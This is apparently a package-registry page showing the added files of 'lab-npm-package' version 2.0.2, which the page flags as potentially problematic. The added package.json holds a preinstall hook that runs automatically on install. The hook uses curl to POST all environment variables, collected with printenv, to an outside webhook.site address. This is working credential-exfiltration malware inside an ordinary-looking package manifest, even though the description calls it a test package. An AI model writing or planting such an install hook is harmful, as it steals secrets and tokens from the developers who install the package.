lab-npm-package 2.0.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of lab-npm-package might be problematic. Click here for more details.
- package/index.js +7 -0
- package/package.json +16 -0
- package/test/script.js +5 -0
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
{
|
2
|
+
"name": "lab-npm-package",
|
3
|
+
"version": "2.0.2",
|
4
|
+
"description": "This is a test package, please don't install and use this",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "curl -X POST -H 'Content-Type: application/json' -d '{'environment_variables': ''$(printenv | jq -Rs .)''}' https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c"
|
8
|
+
},
|
9
|
+
"author": "Rajesh Kanumuru",
|
10
|
+
"license": "ISC"
|
11
|
+
}
|
12
|
+
|
13
|
+
|
14
|
+
|
15
|
+
|
16
|
+
|